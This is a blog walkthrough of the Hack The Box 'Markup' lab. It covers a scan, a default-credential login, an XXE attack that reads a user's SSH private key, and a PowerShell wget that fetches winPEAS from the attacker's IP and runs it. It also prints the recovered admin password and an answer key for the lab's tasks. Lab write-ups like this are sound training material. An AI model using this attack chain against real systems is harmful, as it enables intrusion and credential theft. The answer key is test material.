#17 Markup - Starting Point - Hack The Box || Complete Walkthrough


Markup is a Windows machine that contains a misconfigured http server, which reveals the SSH key. You can find out more about these next.


Enumeration

Click on the spawn machine to find the Target IP address.

As always, we begin by scanning the target for open ports.

┌──(mrdev㉿mrdev)-[~]
└─$ sudo nmap -sC -A -Pn 10.129.175.175 
[sudo] password for mrdev:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-29 19:20 IST
Nmap scan report for 10.129.175.175
Host is up (0.30s latency). 
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)   
| ssh-hostkey:
|   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA) 
|   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
|_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519) 
80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)  
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
|_http-title: MegaShopping
| http-cookie-flags:  
|   /:     
|     PHPSESSID:   
|_      httponly flag not set  
443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28) 
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47   
|_Not valid after:  2019-11-08T23:48:47
| tls-alpn: 
|_  http/1.1 
|_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28  
|_ssl-date: TLS randomness does not represent time  
|_http-title: MegaShopping
| http-cookie-flags:  
|   /:     
|     PHPSESSID:   
|_      httponly flag not set   
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Polycom SoundPoint IP 331 VoIP phone (98%), Android 7.1.2 (Linux 3.10) (97%), AVtech Room Alert 26W environmental monitor (97%), Avaya Office IP403 VoIP adapter (97%), NetworkAlchemy ArgentBranch PBX (97%), Avaya Office IP500 VoIP adapter (97%), OneAccess 1641 router (95%), Adtran NetVanta 1224R or 3430 router (95%), Blue Coat PacketShaper appliance (95%), CipherLab 5100 time and attendance terminal (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops 
TRACEROUTE (using port 443/tcp) 
HOP RTT       ADDRESS  
1   0.86 ms   mrdev.mshome.net (172.19.0.1)
2   291.97 ms 10.10.14.1  
3   369.86 ms 10.129.175.175
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 77.93 seconds   
┌──(mrdev㉿mrdev)-[~] 
└─$  

Let's navigate to the webpage using the Mozilla Firefox browser:

The webpage features the landing page for an online shopping company. A login screen is presented to us.

A username and password are being requested. Let’s try to attempt some default credentials for the Mega shopping service to get login access.

Let’s try to log in with some default credentials like,

admin: admin
administrator: administrator
admin: administrator
admin: password

After manually attempting, we land on a successful login. The correct combination is  admin: password

We are presented with the customer store panel.


Foothold

The website has some basic functionality that allows you to place orders.

Start Burp suite, and capture the request:

If we capture the request and take a look at it with Burp we can see that the data is processed in XML format. Furthermore, let’s try if there is an XXE (XML External Entity) vulnerability that exists or not.

  • Learn More: 

XML External Entity (XXE) Injection

This resource delves into XML External Entity (XXE) injection, a vulnerability that allows attackers to exploit applications that parse XML input. It explains how XXE attacks work, their impact, and methods to prevent them.


XML external entity (XXE) injection

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server-side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts.

We can perform an XML injection (XXE External Entity Injection) attack to receive the contents of the win.ini file.


Now send this to the repeater using ctrl + R . Our assumption was true, it reveals that the web server contains XXE vulnerability .

From the Nmap scan, we confirmed that the Port 22 SSH server is running on the Windows server. What if I found user details then probably we could find out the SSH key. I found a user denial from the source code of the webpage.

So change the code and give the SSH path where the key is stored. The SSH private keys are usually stored in C:\Users\username\ dot ssh\id_rsa .

We got an Open-SSH private key code. So, I grabbed the key and saved it in a file called id_rsa using the nano text editor. 

┌──(mrdev㉿mrdev)-[~]  
└─$ sudo nano id_rsa
┌──(mrdev㉿mrdev)-[~]  
└─$ sudo chmod 400 id_rsa

So next we try to SSH to the server with daniel's key.

┌──(mrdev㉿mrdev)-[~]  
└─$ ssh -i id_rsa [email protected]
Microsoft Windows [Version 10.0.17763.107] 
(c) 2018 Microsoft Corporation. All rights reserved.
daniel@MARKUP C:\Users\daniel>

You can find out the user flag from the desktop:

Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.  
daniel@MARKUP C:\Users\daniel> cd Desktop        
daniel@MARKUP C:\Users\daniel\Desktop> type user.txt   
0***********************7 
daniel@MARKUP C:\Users\daniel\Desktop> 


Privilege Escalation

Escalating the privilege is quite easy, you just need to upload the winPEAS.exe file to the desktop and then execute it. Which will automatically reveal the administrative username and password. Let’s see how it works.


Windows Privilege Escalation using WinPEAS

Previously, I had a copy of the  winPEAS.exe file on c:\xampp\htdocs of the xampp server and, start the Apache server.

Switch back to the SSH shell run the PowerShell command and then upload winPEAS.exe using wget.

daniel@MARKUP C:\Users\daniel\Desktop> powershell
Windows PowerShell    
Copyright (C) Microsoft Corporation. All rights reserved. 
PS C:\Users\daniel\Desktop> wget http://{OpenVPN IP(tun0)}/winPEASx64.exe -outfile winPEASx64.exe

Execute the winPEASx64.exe :

PS C:\Users\danial\Desktop> .\winPEASx64.exe

Analyze and you can find out the password from the Administrator.

We have now an Administrator username and password, so let’s connect with SSH.

┌──(mrdev㉿mrdev)-[~]  
└─$ ssh [email protected]
[email protected]'s password: Yhk}QE&j<3M

You can find out the root flag from the desktop:

Microsoft Windows [Version 10.0.17763.107] 
(c) 2018 Microsoft Corporation. All rights reserved.
administrator@MARKUP C:\Users\Administrator> cd Desktop

administrator@MARKUP C:\Users\Administrator\Desktop> type root.txt
f******************************8

administrator@MARKUP C:\Users\Administrator\Desktop>


Task Solutions


TASK 1: What version of Apache is running on the target's port 80?

Ans. 2.4.41

TASK 2: What username:password combination logs in successfully?

Ans. admin:password

TASK 3: What is the word at the top of the page that accepts user input?

Ans. order

TASK 4: What XML version is used on the target?

Ans. 1.0

TASK 5: What does the XXE / XEE attack acronym stand for?

Ans. XML External Entity

TASK 6: What username can we find on the webpage's HTML code?

Ans. Daniel

TASK 7: What is the file located in the Log-Management folder on the target?

Ans. job.bat

TASK 8: What executable is mentioned in the file mentioned before?

Ans. wevtutil.exe

Tags

You may like these posts

Show more

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

If you have any doubts or any queries you can specify here.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!